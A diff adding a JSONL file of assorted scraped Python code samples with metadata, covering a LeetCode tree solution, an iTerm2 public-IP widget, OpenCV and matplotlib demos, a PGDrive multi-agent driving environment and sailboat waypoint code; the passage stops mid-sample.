diff --git "a/4114.jsonl" "b/4114.jsonl" new file mode 100644--- /dev/null +++ "b/4114.jsonl" @@ -0,0 +1,635 @@ +{"seq_id":"631888591","text":"#Time Complexity : O(N)\n#Space Complexity: O(N)\n#Yes it ran on leetcode\n\n\nclass Solution(object):\n def buildTree(self, preorder, inorder):\n global dic\n dic = {}\n global idx\n idx = 0\n if len(preorder) == 0 and len(inorder) == 0:\n return None\n for i in range(len(inorder)):\n dic[inorder[i]] = i\n return self.helper(preorder, inorder, 0, len(inorder) - 1)\n\n def helper(self, preorder, inorder, start, end):\n global dic\n global idx\n # base\n if idx == len(preorder) or start > end:\n return None\n\n # logic\n\n rootIdx = dic[preorder[idx]]\n root = TreeNode(preorder[idx])\n idx += 1\n root.left = self.helper(preorder, inorder, start, rootIdx - 1)\n root.right = self.helper(preorder, inorder, rootIdx + 1, end)\n\n return root","sub_path":"Construct_Binary_Tree.py","file_name":"Construct_Binary_Tree.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"225415147","text":"#!/usr/bin/env python3\n\nimport urllib.request\nimport iterm2\n\n\nasync def main(connection):\n component = iterm2.StatusBarComponent(\n short_description=\"Show PublicIP\",\n detailed_description=\"Show Public IP Address\",\n knobs=[],\n exemplar=\"[Public IP]\",\n update_cadence=30,\n identifier=\"koh-sh.iterm2-statusbar-scripts.publicip\"\n )\n\n @iterm2.StatusBarRPC\n async def showpublicip(knobs):\n url = 'http://checkip.amazonaws.com/'\n try:\n req = urllib.request.Request(url)\n with urllib.request.urlopen(req) as res:\n body = res.read()\n return \"PublicIP: \" + str(body.decode()).replace(\"\\n\", \"\")\n except Exception:\n return \"No Connection\"\n\n await component.async_register(connection, showpublicip)\n\niterm2.run_forever(main)\n","sub_path":"publicip.py","file_name":"publicip.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"380277425","text":"\"\"\"Test the yig driver by looping back:\n note-cannot use YIG_*atten because it goes below ground\n YIG_1_tune to Analog_In_1 5:1 voltage divider\n YIG_1_tune to Analog_In_2 5:1 voltage divider\n YIG_2_tune to Analog_In_5 5:1 voltage divider\n YIG_2_tune to Analog_In_6 5:1 voltage divider\n P0_0 to P1_0\n P0_1 to P1_1\n P0_2 to P1_2\n\"\"\"\n\nimport time\nimport curses\nimport numpy as np\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom time import sleep\nexec(compile(open(\"./io_board_subs.py\", \"rb\").read(), \"./io_board_subs.py\", 'exec'))\nGPIO.setwarnings(False)\ndef main(win):\n global stdscr\n stdscr = win\n curses.initscr()\n curses.nl()\n curses.noecho()\n#Instantiate the devices and objects we need\n dio = Dio()\n adc0 = Adc(0)\n dac0 = Dac(0)\n adc1 = Adc(1)\n dac1 = Dac(1)\n adc0.setOneShotMode()\n adc1.setOneShotMode()\n stdscr.clear\n stdscr.move(1,20)\n stdscr.addstr(\"YIG DRIVER LOOPBACK\")\n stdscr.move(2,1)\n stdscr.addstr(\"count: \")\n stdscr.move(4,1)\n stdscr.addstr(\"ANALOG_IN_1: \")\n stdscr.move(5,1)\n stdscr.addstr(\"ANALOG_IN_2: \")\n stdscr.move(6,1)\n stdscr.addstr(\"ANALOG_IN_5: \")\n stdscr.move(7,1)\n stdscr.addstr(\"ANALOG_IN_6: \")\n stdscr.move(9,1)\n stdscr.addstr(\"DIO OUT\")\n stdscr.move(9,12)\n stdscr.addstr(\"DIO IN\")\n stdscr.move(10,1)\n stdscr.addstr(\"0: \")\n stdscr.move(11,1)\n stdscr.addstr(\"1: \")\n stdscr.move(12,1)\n stdscr.addstr(\"2: \")\n 
stdscr.move(13,1)\n stdscr.addstr(\"4: \")\n stdscr.refresh()\n def check_db():\n dac0.write(2,32767) # U3-7 V_OUTC Analog_Out_3\n dac1.write(2,32767) # U6-7 V_OUTC Analog_Out_7\n i = 0\n while True:\n i = i+1\n stdscr.move(2,15)\n stdscr.clrtoeol()\n stdscr.addstr(str(i))\n dac0.write(0,i) # U3-1 V_OUTA Analog_Out_1 YIG_1_tune\n# dac1.write(0,i) # U6-1 V_OUTA Analog_Out_5 YIG_2_tune\n# dac0.write(1,i) # U3-2 V_OUTB Analog_Out_2 YIG_1_atten\n# dac0.write(3,i) # U6-2 V_OUTB Analog_Out_6 YIG_2_atten\n# Analog_In_1 = adc0.read(0)\n stdscr.move(4,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_1))\n# Analog_In_2 = adc0.read(1)\n stdscr.move(5,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_2))\n# Analog_In_5 = adc1.read(0)\n stdscr.move(6,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_5))\n# Analog_In_6 = adc1.read(1)\n stdscr.move(7,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(Analog_In_6))\n# dio.write(0)\n# readback = dio.read()\n stdscr.move(10,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n# dio.write(1)\n# readback = dio.read()\n stdscr.move(11,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n# dio.write(2)\n# readback = dio.read()\n stdscr.move(12,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n# dio.write(4)\n# readback = dio.read()\n stdscr.move(13,15)\n stdscr.clrtoeol()\n# stdscr.addstr(str(readback))\n stdscr.refresh()\n sleep(0.05)\n if i >= 65535: \n i = 0\n check_db()\n curses.nocbreak(); \n stdscr.keypad(0); \n curses.echo()\ncurses.wrapper(main)\n","sub_path":"look_at_i2c_buss.py","file_name":"look_at_i2c_buss.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"653502721","text":"import numpy as np\nimport matplotlib\n\n# sudo apt install python3-tk\n# sudo -H pip3 install PyQt5\n# print('matplotlib all backends are:')\n# backends = sorted(matplotlib.rcsetup.all_backends, key=str.lower)\n# for backend in backends:\n# \tprint(' ', backend)\n# print('matplotlib default backend is:', matplotlib.get_backend())\n# matplotlib.use('Qt5Agg')\n# print('matplotlib current backend is:', matplotlib.get_backend())\nimport matplotlib.pyplot as plt\n\ndef mandelbrot(h, w, maxit=20):\n\t\"\"\"Returns an image of the Mandelbrot fractal of size (h,w).\"\"\"\n\ty, x = np.ogrid[-1.4:1.4:h * 1j, -2:0.8:w * 1j]\n\tc = x + y * 1j\n\tz = c\n\tdivtime = maxit + np.zeros(z.shape, dtype=int)\n\n\tfor i in range(maxit):\n\t\tz = z ** 2 + c\n\t\tdiverge = z * np.conj(z) > 2 ** 2 # who is diverging\n\t\tdiv_now = diverge & (divtime == maxit) # who is diverging now\n\t\tdivtime[div_now] = i # note when\n\t\tz[diverge] = 2 # avoid diverging too much\n\n\treturn divtime\n\ndef plot_histogram1():\n\t# Build a vector of 10000 normal deviates with variance 0.5^2 and mean 2\n\tmu, sigma = 2, 0.5\n\tv = np.random.normal(mu, sigma, 10000)\n\t# Plot a normalized histogram with 50 bins\n\tplt.hist(v, bins=50, normed=1) # matplotlib version (plot)\n\tplt.show()\n\ndef plot_histogram2():\n\tmu, sigma = 2, 0.5\n\tv = np.random.normal(mu, sigma, 10000)\n\t# Compute the histogram with numpy and then plot it\n\t(n, bins) = np.histogram(v, bins=50, normed=True) # NumPy version (no plot)\n\tplt.plot(.5 * (bins[1:] + bins[:-1]), n)\n\tplt.show()\n\ndef main():\n\tplt.imshow(mandelbrot(400, 400))\n\tplt.show()\n\t# plt.savefig('foo.png')\n\n\tplot_histogram1()\n\n\tplot_histogram2()\n\nif __name__ == 
'__main__':\n\tmain()\n","sub_path":"toys/numpy_mandelbrot.py","file_name":"numpy_mandelbrot.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"238680884","text":"import cv2\nimport numpy as np\n\n# https://www.youtube.com/watch?v=WQeoO7MI0Bs\n\nimg = cv2.imread(\"resources/Lena.png\")\nkernel = np.ones((5, 5), np.uint8)\n\n# making an image gray\nimgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# cv2.imshow(\"gray image\", imgGray)\n\n# making an image blur\nimgBlur = cv2.GaussianBlur(imgGray, (7, 7), 0) # kernel need to be odd numbers\n# cv2.imshow(\"blur image\", imgBlur)\n\n# edge detection\nimgCanny = cv2.Canny(img, 150, 200)\n# cv2.imshow(\"canny\", imgCanny)\n\n# dialation\nimgDialation = cv2.dilate(imgCanny, kernel, iterations=1)\n# cv2.imshow(\"dialation\", imgDialation)\n\n# thinner image\nimgEroded = cv2.erode(imgDialation, kernel, iterations=1)\n# cv2.imshow(\"eroded\", imgEroded)\n\ncv2.waitKey(0)\n","sub_path":"Chapter2.py","file_name":"Chapter2.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"187254924","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n\n\"\"\"\n############\n# Standard #\n############\nimport os\nimport logging\n\n###############\n# Third Party #\n###############\nimport cv2\nimport numpy as np\nimport simplejson as sjson\nfrom pyadplugin import ADPluginServer, ADPluginFunction\n\n##########\n# Module #\n##########\nfrom .statistics import contouring_pipeline\n\nlogger = logging.getLogger(__name__)\n\ndef contouring_plugin(ad_prefix, plugin_prefix=\"\", plugin_suffix=\"\", \n save_image=False, image_dir=None, save_json=False, \n json_path=None, min_cbtime=2, stream=\"IMAGE2\",\n enable_callbacks=True, resize=1.0, kernel=(11,11),\n description=\"\", threshold_factor=2):\n \"\"\"\n Runs a pyadplugin that uses the contouring pipeline.\n \"\"\"\n # Set the image saving path\n if save_image:\n save_frequency = 0.2\n if image_dir is None:\n image_dir = Path(os.path.dirname(os.path.abspath(__file__)) / \n \"{0}_images_{1}\".format(\n plugin_prefix, plugin_suffix))\n else:\n image_dir = Path(str(image_dir))\n # Check that the path exists, create it if not\n if not image_dir.exists():\n image_dir.mkdir(parents=True)\n\n # Set the json saving path\n if save_json:\n if json_path is None:\n json_path = Path(os.path.dirname(os.path.abspath(__file__)) / \n \"{0}_data{1}.json\".format(\n plugin_prefix, plugin_suffix))\n else:\n json_path = Path(str(json_path))\n # Check the file and its parents exist, making them if they don't\n if not json_path.exists():\n json_path.parent.mkdir(parents=True)\n json_path.touch()\n\n # Description to be passed on as a PV\n if not description:\n description = \"PyADPlugin '{0}{1}': Pipeline to output beam statitics.\"\n\n # Define the ADPluginFunction\n def pyad_contouring_plugin(array, height=None, width=None):\n return contouring_pipeline(\n array, height=height, width=width, resize=resize, kernel=kernel,\n prefix=plugin_prefix, suffix=plugin_suffix, save=save_frequency,\n description=description, json_path=json_path, save_image=save_image,\n image_dir=image_dir, thresh_factor=threshold_factor)\n\n # Define the default values for the pv dictionary\n output_dict = {\n \"{0}:DESC{1}\".format(plugin_prefix, plugin_suffix): description,\n \"{0}:BEAM{1}\".format(plugin_prefix, plugin_suffix) : False, \n 
\"{0}:CENT:X{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:CENT:Y{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:LENGTH{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:WIDTH{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:AREA{1}\".format(plugin_prefix, plugin_suffix) : -1, \n \"{0}:MATCH{1}\".format(plugin_prefix, plugin_suffix) : -1,\n \"{0}:M{1}\".format(plugin_prefix, plugin_suffix) : np.zeros((24))-1,\n }\n\n logger.info(\"Running '{0}{1}' server for '{2}'.\".format(\n plugin_prefix, plugin_suffix, ad_prefix))\n\n try:\n # Set up the server\n pyad_server = ADPluginServer(\n prefix = prefix,\n ad_prefix = ad_prefix,\n stream = stream,\n min_cbtime = min_cbtime,\n enable_callbacks = enable_callbacks,\n )\n\n # Define the function\n pyad_function = ADPluginFunction(\n \"{0}{1}\".format(plugin_prefix, plugin_suffix), \n output_dict,\n pyad_contouring_plugin,\n pyad_server,\n )\n \n # Log any exceptions we run into\n except Exception as e:\n logger.error(\"Exception raised by pyad server/function:\\n{0}\".format(e))\n raise\n\n \n \n\n \n \n \n \n \n","sub_path":"psbeam/pyadplugins/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":3970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"277501941","text":"# library imports\nimport cv2.cv2 as cv\nimport numpy as np\n\n# Chargement d'une image\nimg = cv.imread('../images/bgr.png')\ncv.imshow('Input', img)\n\n# Récupération de la longueur et la largueur\nwidth = img.shape[0]\nheight = img.shape[1]\n\n# Récupération des canaux de couleurs\nblues, greens, reds = cv.split(img)\n\n# display the image with OpenCV imshow()\n# cv.imshow('(B)lues', blues)\n# cv.imshow('(G)reens', greens)\n# cv.imshow('(R)eds ', reds)\n\n# Création d'une matrice vide avec convertion du depth\nzero = np.zeros((width, height))\nzero = np.uint8(zero)\n\nRG = cv.merge([zero, greens, reds])\nBR = cv.merge((blues, zero, reds))\nBG = cv.merge((blues, greens, zero))\nB = cv.merge((blues, zero, zero))\nG = cv.merge((zero, greens, zero))\nR = cv.merge((zero, zero, reds))\ncv.imshow('R+G', RG)\ncv.imshow('R+B', BR)\ncv.imshow('B+G', BG)\ncv.imshow('B', B)\ncv.imshow('G', G)\ncv.imshow('R', R)\n\n# OpenCV waitKey() is a required keyboard binding function after imwshow()\ncv.waitKey(0)\n# destroy all windows command\ncv.destroyAllWindows()","sub_path":"Exercices/exercice2.py","file_name":"exercice2.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"492740033","text":"import copy\nimport logging\n\nfrom pgdrive.constants import TerminationState\nfrom pgdrive.envs.pgdrive_env_v2 import PGDriveEnvV2\nfrom pgdrive.scene_creator.blocks.first_block import FirstBlock\nfrom pgdrive.scene_creator.road.road import Road\nfrom pgdrive.scene_manager.spawn_manager import SpawnManager\nfrom pgdrive.utils import setup_logger, get_np_random, PGConfig\nfrom pgdrive.utils.pg_config import merge_dicts\n\nMULTI_AGENT_PGDRIVE_DEFAULT_CONFIG = dict(\n # ===== Multi-agent =====\n is_multi_agent=True,\n num_agents=2, # If num_agents is set to None, then endless vehicles will be added only the empty spawn points exist\n\n # Whether to terminate a vehicle if it crash with others. 
Since in MA env the crash is extremely dense, so\n # frequently done might not be a good idea.\n crash_done=False,\n out_of_road_done=True,\n delay_done=25, # Wait for 5 seconds in real world.\n\n # Whether the vehicle can rejoin the episode\n allow_respawn=True,\n\n # The maximum length of the episode. If allow respawn, then this is the maximum step that respawn can happen. After\n # that, the episode won't terminate until all existing vehicles reach their horizon or done. The vehicle specified\n # horizon is also this value.\n horizon=1000,\n\n # ===== Vehicle Setting =====\n vehicle_config=dict(lidar=dict(num_lasers=72, distance=40, num_others=0)),\n target_vehicle_configs=dict(),\n\n # ===== New Reward Setting =====\n out_of_road_penalty=10,\n crash_vehicle_penalty=10,\n crash_object_penalty=10,\n crash_vehicle_cost=1,\n crash_object_cost=1,\n out_of_road_cost=0, # Do not count out of road into cost!\n\n # ===== Environmental Setting =====\n top_down_camera_initial_x=0,\n top_down_camera_initial_y=0,\n top_down_camera_initial_z=120, # height\n traffic_density=0.,\n auto_termination=False,\n camera_height=4,\n)\n\n\nclass MultiAgentPGDrive(PGDriveEnvV2):\n \"\"\"\n This serve as the base class for Multi-agent PGDrive!\n \"\"\"\n\n # A list of road instances denoting which roads afford spawn points. If not set, then search for all\n # possible roads and spawn new agents in them if possible.\n spawn_roads = [\n # Road(FirstBlock.NODE_1, FirstBlock.NODE_2),\n Road(FirstBlock.NODE_2, FirstBlock.NODE_3)\n ]\n\n @staticmethod\n def default_config() -> PGConfig:\n config = PGDriveEnvV2.default_config()\n config.update(MULTI_AGENT_PGDRIVE_DEFAULT_CONFIG)\n return config\n\n def __init__(self, config=None):\n self._raw_input_config = copy.deepcopy(config)\n super(MultiAgentPGDrive, self).__init__(config)\n self._top_down_renderer = None\n\n def _process_extra_config(self, config) -> \"PGConfig\":\n ret_config = self.default_config().update(\n config, allow_overwrite=False, stop_recursive_update=[\"target_vehicle_configs\"]\n )\n if not ret_config[\"crash_done\"] and ret_config[\"crash_vehicle_penalty\"] > 2:\n logging.warning(\n \"Are you sure you wish to set crash_vehicle_penalty={} when crash_done=False?\".format(\n ret_config[\"crash_vehicle_penalty\"]\n )\n )\n if ret_config[\"use_render\"] and ret_config[\"fast\"]:\n logging.warning(\"Turn fast=False can accelerate Multi-agent rendering performance!\")\n\n # Workaround\n if ret_config[\"target_vehicle_configs\"]:\n for k, v in ret_config[\"target_vehicle_configs\"].items():\n old = ret_config[\"vehicle_config\"].copy()\n new = old.update(v)\n ret_config[\"target_vehicle_configs\"][k] = new\n\n self._spawn_manager = SpawnManager(\n exit_length=ret_config[\"map_config\"][\"exit_length\"],\n lane_num=ret_config[\"map_config\"][\"lane_num\"],\n num_agents=ret_config[\"num_agents\"],\n vehicle_config=ret_config[\"vehicle_config\"],\n target_vehicle_configs=ret_config[\"target_vehicle_configs\"],\n seed=self._DEBUG_RANDOM_SEED\n )\n\n self._spawn_manager.set_spawn_roads(self.spawn_roads)\n\n ret_config = self._update_agent_pos_configs(ret_config)\n return ret_config\n\n def _update_agent_pos_configs(self, config):\n config[\"target_vehicle_configs\"] = self._spawn_manager.get_target_vehicle_configs(seed=self._DEBUG_RANDOM_SEED)\n return config\n\n def done_function(self, vehicle_id):\n done, done_info = super(MultiAgentPGDrive, self).done_function(vehicle_id)\n if done_info[TerminationState.CRASH] and (not self.config[\"crash_done\"]):\n assert 
done_info[TerminationState.CRASH_VEHICLE] or \\\n done_info[TerminationState.SUCCESS] or done_info[TerminationState.OUT_OF_ROAD]\n if not (done_info[TerminationState.SUCCESS] or done_info[TerminationState.OUT_OF_ROAD]):\n # Does not revert done if high-priority termination happens!\n done = False\n\n if done_info[TerminationState.OUT_OF_ROAD] and (not self.config[\"out_of_road_done\"]):\n assert done_info[TerminationState.CRASH_VEHICLE] or \\\n done_info[TerminationState.SUCCESS] or done_info[TerminationState.OUT_OF_ROAD]\n if not done_info[TerminationState.SUCCESS]:\n done = False\n\n return done, done_info\n\n def step(self, actions):\n o, r, d, i = super(MultiAgentPGDrive, self).step(actions)\n o, r, d, i = self._after_vehicle_done(o, r, d, i)\n\n # Update respawn manager\n if self.episode_steps >= self.config[\"horizon\"] or self.scene_manager.replay_system is not None:\n self.agent_manager.set_allow_respawn(False)\n self._spawn_manager.step()\n new_obs_dict = self._respawn_vehicles(randomize_position=self.config[\"random_traffic\"])\n if new_obs_dict:\n for new_id, new_obs in new_obs_dict.items():\n o[new_id] = new_obs\n r[new_id] = 0.0\n i[new_id] = {}\n d[new_id] = False\n\n # Update __all__\n d[\"__all__\"] = (\n ((self.episode_steps >= self.config[\"horizon\"]) and (all(d.values()))) or (len(self.vehicles) == 0)\n or (self.episode_steps >= 5 * self.config[\"horizon\"])\n )\n if d[\"__all__\"]:\n for k in d.keys():\n d[k] = True\n\n return o, r, d, i\n\n def reset(self, *args, **kwargs):\n self.config = self._update_agent_pos_configs(self.config)\n ret = super(MultiAgentPGDrive, self).reset(*args, **kwargs)\n assert (len(self.vehicles) == self.num_agents) or (self.num_agents == -1)\n return ret\n\n def _reset_agents(self):\n # update config (for new possible spawn places)\n for v_id, v in self.vehicles.items():\n if v_id in self.config[\"target_vehicle_configs\"]:\n v.vehicle_config = self._get_single_vehicle_config(self.config[\"target_vehicle_configs\"][v_id])\n super(MultiAgentPGDrive, self)._reset_agents() # Update config before actually resetting!\n for v_id, _ in self.vehicles.items():\n self._update_destination_for(v_id)\n\n def _after_vehicle_done(self, obs=None, reward=None, dones: dict = None, info=None):\n if self.scene_manager.replay_system is not None:\n return obs, reward, dones, info\n for v_id, v_info in info.items():\n if v_info.get(\"episode_length\", 0) >= self.config[\"horizon\"]:\n if dones[v_id] is not None:\n info[v_id][TerminationState.MAX_STEP] = True\n dones[v_id] = True\n self.dones[v_id] = True\n for dead_vehicle_id, done in dones.items():\n if done:\n self.agent_manager.finish(\n dead_vehicle_id, ignore_delay_done=info[dead_vehicle_id].get(TerminationState.SUCCESS, False)\n )\n self._update_camera_after_finish(dead_vehicle_id)\n return obs, reward, dones, info\n\n def _update_camera_after_finish(self, dead_vehicle_id):\n if self.main_camera is not None and dead_vehicle_id == self.agent_manager.object_to_agent(\n self.current_track_vehicle.name) \\\n and self.pg_world.taskMgr.hasTaskNamed(self.main_camera.CHASE_TASK_NAME):\n self.chase_another_v()\n\n def _get_target_vehicle_config(self):\n return {\n name: self._get_single_vehicle_config(new_config)\n for name, new_config in self.config[\"target_vehicle_configs\"].items()\n }\n\n def _get_observations(self):\n return {\n name: self.get_single_observation(self._get_single_vehicle_config(new_config))\n for name, new_config in self.config[\"target_vehicle_configs\"].items()\n }\n\n def 
_get_single_vehicle_config(self, extra_config: dict):\n \"\"\"\n Newly introduce method\n \"\"\"\n vehicle_config = merge_dicts(self.config[\"vehicle_config\"], extra_config, allow_new_keys=False)\n return PGConfig(vehicle_config)\n\n def _after_lazy_init(self):\n super(MultiAgentPGDrive, self)._after_lazy_init()\n\n # Use top-down view by default\n if hasattr(self, \"main_camera\") and self.main_camera is not None:\n top_down_camera_height = self.config[\"top_down_camera_initial_z\"]\n self.main_camera.camera.setPos(0, 0, top_down_camera_height)\n self.main_camera.top_down_camera_height = top_down_camera_height\n self.main_camera.stop_track(self.pg_world, self.current_track_vehicle)\n self.main_camera.camera_x += self.config[\"top_down_camera_initial_x\"]\n self.main_camera.camera_y += self.config[\"top_down_camera_initial_y\"]\n\n def _respawn_vehicles(self, randomize_position=False):\n new_obs_dict = {}\n if not self.agent_manager.has_pending_objects():\n return new_obs_dict\n while True:\n new_id, new_obs = self._respawn_single_vehicle(randomize_position=randomize_position)\n if new_obs is not None:\n new_obs_dict[new_id] = new_obs\n else:\n break\n return new_obs_dict\n\n def _force_respawn(self, agent_name, randomize_position=False):\n \"\"\"\n This function can force a given vehicle to respawn!\n \"\"\"\n self.agent_manager.finish(agent_name, ignore_delay_done=True)\n self._update_camera_after_finish(agent_name)\n new_id, new_obs = self._respawn_single_vehicle(randomize_position=randomize_position)\n return new_id, new_obs\n\n def _respawn_single_vehicle(self, randomize_position=False):\n \"\"\"\n Arbitrary insert a new vehicle to a new spawn place if possible.\n \"\"\"\n safe_places_dict = self._spawn_manager.get_available_respawn_places(\n self.pg_world, self.current_map, randomize=randomize_position\n )\n if len(safe_places_dict) == 0 or not self.agent_manager.allow_respawn:\n # No more run, just wait!\n return None, None\n assert len(safe_places_dict) > 0\n bp_index = get_np_random(self._DEBUG_RANDOM_SEED).choice(list(safe_places_dict.keys()), 1)[0]\n new_spawn_place = safe_places_dict[bp_index]\n\n if new_spawn_place[self._spawn_manager.FORCE_AGENT_NAME] is not None:\n if new_spawn_place[self._spawn_manager.FORCE_AGENT_NAME] != self.agent_manager.next_agent_id():\n return None, None\n\n new_agent_id, vehicle = self.agent_manager.propose_new_vehicle()\n new_spawn_place_config = new_spawn_place[\"config\"]\n vehicle.vehicle_config.update(new_spawn_place_config)\n vehicle.reset(self.current_map)\n self._update_destination_for(new_agent_id)\n vehicle.update_state(detector_mask=None)\n self.dones[new_agent_id] = False # Put it in the internal dead-tracking dict.\n\n new_obs = self.observations[new_agent_id].observe(vehicle)\n return new_agent_id, new_obs\n\n def _update_destination_for(self, vehicle_id):\n pass\n\n # when agent re-joined to the game, call this to set the new route to destination\n # end_road = -get_np_random(self._DEBUG_RANDOM_SEED).choice(self.spawn_roads) # Use negative road!\n # vehicle.routing_localization.set_route(vehicle.lane_index[0], end_road.end_node)\n\n def render(self, mode='human', text=None, *args, **kwargs):\n if mode == \"top_down\":\n ret = self._render_topdown(*args, **kwargs)\n else:\n ret = super(MultiAgentPGDrive, self).render(mode=mode, text=text)\n return ret\n\n def _render_topdown(self, *args, **kwargs):\n if self._top_down_renderer is None:\n from pgdrive.obs.top_down_renderer import TopDownRenderer\n self._top_down_renderer = 
TopDownRenderer(self.current_map, *args, **kwargs)\n self._top_down_renderer.render(list(self.vehicles.values()))\n\n def close_and_reset_num_agents(self, num_agents):\n config = copy.deepcopy(self._raw_input_config)\n self.close()\n config[\"num_agents\"] = num_agents\n super(MultiAgentPGDrive, self).__init__(config)\n\n\ndef _test():\n setup_logger(True)\n env = MultiAgentPGDrive(\n {\n \"num_agents\": 12,\n \"allow_respawn\": False,\n \"use_render\": True,\n \"debug\": False,\n \"fast\": True,\n \"manual_control\": True,\n \"pg_world_config\": {\n \"pstats\": False\n },\n }\n )\n o = env.reset()\n total_r = 0\n for i in range(1, 100000):\n # o, r, d, info = env.step(env.action_space.sample())\n o, r, d, info = env.step({v_id: [0, 1] for v_id in env.vehicles.keys()})\n for r_ in r.values():\n total_r += r_\n # o, r, d, info = env.step([0,1])\n d.update({\"total_r\": total_r})\n # env.render(text=d)\n if len(env.vehicles) == 0:\n total_r = 0\n print(\"Reset\")\n env.reset()\n env.close()\n\n\ndef _vis():\n setup_logger(True)\n env = MultiAgentPGDrive(\n {\n # \"use_render\": True,\n # \"fast\": True,\n \"num_agents\": 12,\n \"allow_respawn\": False,\n \"manual_control\": True,\n \"pg_world_config\": {\n \"pstats\": False\n },\n }\n )\n o = env.reset()\n total_r = 0\n for i in range(1, 100000):\n # o, r, d, info = env.step(env.action_space.sample())\n o, r, d, info = env.step({v_id: [0.0, 0.0] for v_id in env.vehicles.keys()})\n for r_ in r.values():\n total_r += r_\n # o, r, d, info = env.step([0,1])\n # d.update({\"total_r\": total_r})\n env.render(mode=\"top_down\")\n if len(env.vehicles) == 0:\n total_r = 0\n print(\"Reset\")\n env.reset()\n env.close()\n\n\ndef pygame_replay(name, env_class, save=True, other_ckpt=None):\n import copy\n import json\n import pygame\n env = env_class({\"use_topdown\": True})\n ckpt = \"metasvodist_{}_best.json\".format(name) if other_ckpt is None else other_ckpt\n with open(ckpt, \"r\") as f:\n traj = json.load(f)\n o = env.reset(copy.deepcopy(traj))\n frame_count = 0\n while True:\n o, r, d, i = env.step(env.action_space.sample())\n env.pg_world.force_fps.toggle()\n env.render(mode=\"top_down\", num_stack=50, film_size=(4000, 4000), history_smooth=0)\n if save:\n pygame.image.save(env._top_down_renderer._runtime, \"{}_{}.png\".format(name, frame_count))\n frame_count += 1\n if len(env.scene_manager.replay_system.restore_episode_info) == 0:\n env.close()\n\n\nif __name__ == '__main__':\n _vis()\n","sub_path":"pgdrive/envs/multi_agent_pgdrive.py","file_name":"multi_agent_pgdrive.py","file_ext":"py","file_size_in_byte":15730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"43254788","text":"'''\nCreated on Jan 19, 2013\n\n@author: joshandrews\n'''\nimport math\nimport sys\nsys.path.append(\"..\")\nfrom datetime import datetime\nimport control.logic.standardcalc as standardcalc\nimport control.GlobalVars as gVars\nimport control.StaticVars as sVars\nimport thread\nimport control.sailbotlogger as SBLogger\nfrom control.logic import coresailinglogic\n\ndef setWayPtCoords(boxCoords): #sets the waypoints of the challenge\n wayPtCoords = [] #order = top face, right face, bottom face, left face\n if (boxCoords[0].lat == boxCoords[1].lat): #square\n wayPtCoords[0] = standardcalc.GPSDistAway(boxCoords[0], 20.0, 100.0)\n wayPtCoords[1] = standardcalc.GPSDistAway(boxCoords[1], 100.0, -20.0)\n wayPtCoords[2] = standardcalc.GPSDistAway(boxCoords[2], -20.0, -100.0)\n wayPtCoords[3] = 
standardcalc.GPSDistAway(boxCoords[3], -100.0, 20.0)\n elif (boxCoords[0].lat < boxCoords[1].lat): #diamond or tilted left square\n cAngle = standardcalc.angleBetweenTwoCoords(boxCoords[0],boxCoords[1])\n wayPntDist1 = 100.0*math.cos(cAngle)\n wayPntDist2 = 100.0*math.sin(cAngle)\n midDist1 = 20.0*math.cos(90 - cAngle)\n midDist2 = 20.0*math.sin(90 - cAngle)\n \n topMidpnt = standardcalc.GPSDistAway(boxCoords[0], midDist1, midDist2)\n rightMidpnt = standardcalc.GPSDistAway(boxCoords[1], midDist2, -midDist1)\n botMidpnt = standardcalc.GPSDistAway(boxCoords[2], -midDist1, -midDist2)\n leftMidpnt = standardcalc.GPSDistAway(boxCoords[3], -midDist2, midDist1)\n wayPtCoords[0] = standardcalc.GPSDistAway(topMidpnt, -wayPntDist1, wayPntDist2)\n wayPtCoords[1] = standardcalc.GPSDistAway(rightMidpnt, wayPntDist2, wayPntDist1)\n wayPtCoords[2] = standardcalc.GPSDistAway(botMidpnt, wayPntDist1, -wayPntDist2)\n wayPtCoords[3] = standardcalc.GPSDistAway(leftMidpnt, -wayPntDist2, -wayPntDist1)\n else: #right tilted square\n cAngle = 180 - standardcalc.angleBetweenTwoCoords(boxCoords[0],boxCoords[1])\n wayPntDist1 = 100.0*math.cos(cAngle)\n wayPntDist2 = 100.0*math.sin(cAngle)\n midDist1 = 20.0*math.cos(90 - cAngle)\n midDist2 = 20.0*math.sin(90 - cAngle)\n \n topMidpnt = standardcalc.GPSDistAway(boxCoords[0], midDist1, -midDist2)\n rightMidpnt = standardcalc.GPSDistAway(boxCoords[1], -midDist2, -midDist1)\n botMidpnt = standardcalc.GPSDistAway(boxCoords[2], -midDist1, midDist2)\n leftMidpnt = standardcalc.GPSDistAway(boxCoords[3], midDist2, midDist1)\n wayPtCoords[0] = standardcalc.GPSDistAway(topMidpnt, wayPntDist1, 